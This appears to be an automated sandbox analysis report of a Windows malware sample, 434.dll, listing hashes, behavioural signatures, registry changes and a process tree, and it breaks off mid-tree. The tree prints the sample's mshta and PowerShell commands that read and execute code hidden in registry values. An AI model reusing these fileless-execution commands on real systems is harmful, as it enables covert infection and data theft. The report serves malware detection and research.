Analysis
-
max time kernel
151s -
max time network
140s -
platform
windows7_x64 -
resource
win7 -
submitted
13-07-2020 16:55
Static task
static1
Behavioral task
behavioral1
Sample
434.dll
Resource
win7
General
-
Target
434.dll
-
Size
367KB
-
MD5
7e9c8822be0f73073ce2cc5ef5a13c96
-
SHA1
10b2f8667db53eaf1b85a209d9b80b834425167f
-
SHA256
bd6840cc208517847e130db0c847e715ba80a88e210e6383b37c1d0381877ee5
-
SHA512
120bfec74eed70dc19d7aff9ed8dc392616a6c652f4c7b3f642219c6d5203038e66cef65e67b79041b8653b65021e2402b3cfc0f3b6850afd1d13e2a03637118
Malware Config
Signatures
-
Suspicious use of AdjustPrivilegeToken 33 IoCs
Processes:
svchost.exepowershell.exedescription pid process Token: SeImpersonatePrivilege 1056 svchost.exe Token: SeTcbPrivilege 1056 svchost.exe Token: SeChangeNotifyPrivilege 1056 svchost.exe Token: SeCreateTokenPrivilege 1056 svchost.exe Token: SeBackupPrivilege 1056 svchost.exe Token: SeRestorePrivilege 1056 svchost.exe Token: SeIncreaseQuotaPrivilege 1056 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1056 svchost.exe Token: SeImpersonatePrivilege 1056 svchost.exe Token: SeTcbPrivilege 1056 svchost.exe Token: SeChangeNotifyPrivilege 1056 svchost.exe Token: SeCreateTokenPrivilege 1056 svchost.exe Token: SeBackupPrivilege 1056 svchost.exe Token: SeRestorePrivilege 1056 svchost.exe Token: SeIncreaseQuotaPrivilege 1056 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1056 svchost.exe Token: SeImpersonatePrivilege 1056 svchost.exe Token: SeTcbPrivilege 1056 svchost.exe Token: SeChangeNotifyPrivilege 1056 svchost.exe Token: SeCreateTokenPrivilege 1056 svchost.exe Token: SeBackupPrivilege 1056 svchost.exe Token: SeRestorePrivilege 1056 svchost.exe Token: SeIncreaseQuotaPrivilege 1056 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1056 svchost.exe Token: SeImpersonatePrivilege 1056 svchost.exe Token: SeTcbPrivilege 1056 svchost.exe Token: SeChangeNotifyPrivilege 1056 svchost.exe Token: SeCreateTokenPrivilege 1056 svchost.exe Token: SeBackupPrivilege 1056 svchost.exe Token: SeRestorePrivilege 1056 svchost.exe Token: SeIncreaseQuotaPrivilege 1056 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1056 svchost.exe Token: SeDebugPrivilege 888 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
svchost.exepid process 1056 svchost.exe 1056 svchost.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 888 powershell.exe 1224 Explorer.EXE 2024 cmd.exe -
Processes:
svchost.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 svchost.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 svchost.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Suspicious use of SetThreadContext 5 IoCs
Processes:
rundll32.exesvchost.exepowershell.exeExplorer.EXEcmd.exedescription pid process target process PID 1068 set thread context of 1056 1068 rundll32.exe svchost.exe PID 1056 set thread context of 1996 1056 svchost.exe svchost.exe PID 888 set thread context of 1224 888 powershell.exe Explorer.EXE PID 1224 set thread context of 2024 1224 Explorer.EXE cmd.exe PID 2024 set thread context of 1452 2024 cmd.exe PING.EXE -
Executes dropped EXE 1 IoCs
Processes:
BN368C.tmppid process 1924 BN368C.tmp -
Suspicious use of FindShellTrayWindow 8 IoCs
Processes:
iexplore.exeiexplore.exeExplorer.EXEpid process 1576 iexplore.exe 1776 iexplore.exe 1776 iexplore.exe 1776 iexplore.exe 1224 Explorer.EXE 1224 Explorer.EXE 1224 Explorer.EXE 1224 Explorer.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 1452 PING.EXE -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Explorer.EXEpid process 1224 Explorer.EXE 1224 Explorer.EXE 1224 Explorer.EXE 1224 Explorer.EXE -
Checks whether UAC is enabled 5 IoCs
Processes:
IEXPLORE.EXEiexplore.exeIEXPLORE.EXEiexplore.exeIEXPLORE.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE -
Processes:
iexplore.exeIEXPLORE.EXEiexplore.exeIEXPLORE.EXEmshta.exeIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001b0829a874ca164698fa08cb019bbab800000000020000000000106600000001000020000000f856c1885e1fec08eb8e0bda9db42140dd362cb98afd82dfb178299634aa68c7000000000e8000000002000020000000b9f50eacf56f992acb8828a7295a286ff7ea4c879ddaa2a365d1f81f70eac4d620000000de8de0ec688c8ad3e14c61dddb70e6f533c189ad7db35ce4b85c1a56d449bc444000000002e055adadec5b72e044a471c05039b29a3accd37d8de77eb73ec6779658791dca4d66e6fae5bd54c72d7df6451f0695a8b5be4f6ad9543490fdd1b123d60534 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{C62FAE31-C529-11EA-990A-EACDCAF96E05} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 40c632823659d601 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{ACC3BEF1-C529-11EA-990A-EACDCAF96E05} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001b0829a874ca164698fa08cb019bbab8000000000200000000001066000000010000200000009759ce1b440d3eb003b5027320e03eec35e362a222e9e24beba1a824fdab1b76000000000e8000000002000020000000dac7280025b14a7a72485e74ffe4c4dcf65b24ca72e4c700d59ffc77c3b46f5f9000000042f4e829dc0f975cdb94f199f1c8d870f59fb4d1191cadefd951df3c324d4f59d626c791422ae8937b15772a6de4b575abdb7db3cd7340f40af54d3ba54de9b1b77b01b8746bf676158d939cedbf02612a6fcac5b57705ccf3a660ceeb351cc120f9307aa329a1ea9132a0298eb47634ac7aaff64f763d3d02beb859ef527a91e4b6ea1701969a6b85fb0eb8729ddfcd400000008e224a91d93941da8e4a5b3b2392bf793e56f4da2e4edfeb23c92fa41d05f849285aad3707e36d26e0d2d1684451c7eafe235931b1450b070531156891ca01f4 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 4 api.ipify.org -
Suspicious use of WriteProcessMemory 82 IoCs
Processes:
rundll32.exerundll32.exesvchost.exeiexplore.exeiexplore.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEdescription pid process target process PID 1156 wrote to memory of 1068 1156 rundll32.exe rundll32.exe PID 1156 wrote to memory of 1068 1156 rundll32.exe rundll32.exe PID 1156 wrote to memory of 1068 1156 rundll32.exe rundll32.exe PID 1156 wrote to memory of 1068 1156 rundll32.exe rundll32.exe PID 1156 wrote to memory of 1068 1156 rundll32.exe rundll32.exe PID 1156 wrote to memory of 1068 1156 rundll32.exe rundll32.exe PID 1156 wrote to memory of 1068 1156 rundll32.exe rundll32.exe PID 1068 wrote to memory of 1056 1068 rundll32.exe svchost.exe PID 1068 wrote to memory of 1056 1068 rundll32.exe svchost.exe PID 1068 wrote to memory of 1056 1068 rundll32.exe svchost.exe PID 1068 wrote to memory of 1056 1068 rundll32.exe svchost.exe PID 1068 wrote to memory of 1056 1068 rundll32.exe svchost.exe PID 1068 wrote to memory of 1056 1068 rundll32.exe svchost.exe PID 1056 wrote to memory of 1956 1056 svchost.exe cmd.exe PID 1056 wrote to memory of 1956 1056 svchost.exe cmd.exe PID 1056 wrote to memory of 1956 1056 svchost.exe cmd.exe PID 1056 wrote to memory of 1956 1056 svchost.exe cmd.exe PID 1056 wrote to memory of 1996 1056 svchost.exe svchost.exe PID 1056 wrote to memory of 1996 1056 svchost.exe svchost.exe PID 1056 wrote to memory of 1996 1056 svchost.exe svchost.exe PID 1056 wrote to memory of 1996 1056 svchost.exe svchost.exe PID 1056 wrote to memory of 1996 1056 svchost.exe svchost.exe PID 1056 wrote to memory of 1996 1056 svchost.exe svchost.exe PID 1056 wrote to memory of 1924 1056 svchost.exe BN368C.tmp PID 1056 wrote to memory of 1924 1056 svchost.exe BN368C.tmp PID 1056 wrote to memory of 1924 1056 svchost.exe BN368C.tmp PID 1056 wrote to memory of 1924 1056 svchost.exe BN368C.tmp PID 1576 wrote to memory of 2028 1576 iexplore.exe IEXPLORE.EXE PID 1576 wrote to memory of 2028 1576 iexplore.exe IEXPLORE.EXE PID 1576 wrote to memory of 2028 1576 iexplore.exe IEXPLORE.EXE PID 1576 wrote to memory of 2028 1576 iexplore.exe IEXPLORE.EXE PID 1576 wrote to memory of 1036 1576 iexplore.exe IEXPLORE.EXE PID 1576 wrote to memory of 1036 1576 iexplore.exe IEXPLORE.EXE PID 1576 wrote to memory of 1036 1576 iexplore.exe IEXPLORE.EXE PID 1576 wrote to memory of 1036 1576 iexplore.exe IEXPLORE.EXE PID 1776 wrote to memory of 1404 1776 iexplore.exe IEXPLORE.EXE PID 1776 wrote to memory of 1404 1776 iexplore.exe IEXPLORE.EXE PID 1776 wrote to memory of 1404 1776 iexplore.exe IEXPLORE.EXE PID 1776 wrote to memory of 1404 1776 iexplore.exe IEXPLORE.EXE PID 1776 wrote to memory of 1060 1776 iexplore.exe IEXPLORE.EXE PID 1776 wrote to memory of 1060 1776 iexplore.exe IEXPLORE.EXE PID 1776 wrote to memory of 1060 1776 iexplore.exe IEXPLORE.EXE PID 1776 wrote to memory of 1060 1776 iexplore.exe IEXPLORE.EXE PID 1816 wrote to memory of 888 1816 mshta.exe powershell.exe PID 1816 wrote to memory of 888 1816 mshta.exe powershell.exe PID 1816 wrote to memory of 888 1816 mshta.exe powershell.exe PID 888 wrote to memory of 1564 888 powershell.exe csc.exe PID 888 wrote to memory of 1564 888 powershell.exe csc.exe PID 888 wrote to memory of 1564 888 powershell.exe csc.exe PID 1564 wrote to memory of 1456 1564 csc.exe cvtres.exe PID 1564 wrote to memory of 1456 1564 csc.exe cvtres.exe PID 1564 wrote to memory of 1456 1564 csc.exe cvtres.exe PID 888 wrote to memory of 1568 888 powershell.exe csc.exe PID 888 wrote to memory of 1568 888 powershell.exe csc.exe PID 888 wrote to memory of 1568 888 powershell.exe csc.exe PID 1568 wrote to memory of 1532 1568 csc.exe cvtres.exe PID 1568 wrote to memory of 1532 1568 csc.exe cvtres.exe PID 1568 wrote to memory of 1532 1568 csc.exe cvtres.exe PID 888 wrote to memory of 1224 888 powershell.exe Explorer.EXE PID 888 wrote to memory of 1224 888 powershell.exe Explorer.EXE PID 888 wrote to memory of 1224 888 powershell.exe Explorer.EXE PID 1224 wrote to memory of 2024 1224 Explorer.EXE cmd.exe PID 1224 wrote to memory of 2024 1224 Explorer.EXE cmd.exe PID 1224 wrote to memory of 2024 1224 Explorer.EXE cmd.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
svchost.exepowershell.exeExplorer.EXEpid process 1056 svchost.exe 1056 svchost.exe 1056 svchost.exe 888 powershell.exe 888 powershell.exe 1224 Explorer.EXE 1056 svchost.exe 1056 svchost.exe -
Checks for installed software on the system 1 TTPs 10 IoCs
Processes:
svchost.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall svchost.exe Key enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\DisplayName svchost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious use of SetWindowsHookEx 16 IoCs
Processes:
iexplore.exeIEXPLORE.EXEiexplore.exeIEXPLORE.EXEIEXPLORE.EXEpid process 1576 iexplore.exe 1576 iexplore.exe 2028 IEXPLORE.EXE 2028 IEXPLORE.EXE 1776 iexplore.exe 1776 iexplore.exe 1404 IEXPLORE.EXE 1404 IEXPLORE.EXE 1776 iexplore.exe 1776 iexplore.exe 1060 IEXPLORE.EXE 1060 IEXPLORE.EXE 1776 iexplore.exe 1776 iexplore.exe 1404 IEXPLORE.EXE 1404 IEXPLORE.EXE
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
PID:1224 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\434.dll,#12⤵
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\434.dll,#13⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\SysWOW64\svchost.exeC:\Windows\System32\svchost.exe4⤵
- Suspicious use of AdjustPrivilegeToken
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Checks for installed software on the system
PID:1056 -
C:\Windows\SysWOW64\cmd.execmd /K5⤵PID:1956
-
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\System32\svchost.exe5⤵PID:1996
-
-
C:\Users\Admin\AppData\Local\Temp\BN368C.tmpC:\Users\Admin\AppData\Local\Temp\BN368C.tmp5⤵
- Executes dropped EXE
PID:1924
-
-
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\981CEC34-17F7-8AA9-614C-3B5E25409F72\\\Bdeudler'));if(!window.flag)close()</script>"2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\981CEC34-17F7-8AA9-614C-3B5E25409F72").CIRC2022))3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Drops file in System32 directory
PID:888 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wnjl3ogy\wnjl3ogy.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5485.tmp" "c:\Users\Admin\AppData\Local\Temp\wnjl3ogy\CSC74C9B02F37C45B8A321452955674059.TMP"5⤵PID:1456
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\grdhpird\grdhpird.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1568 -
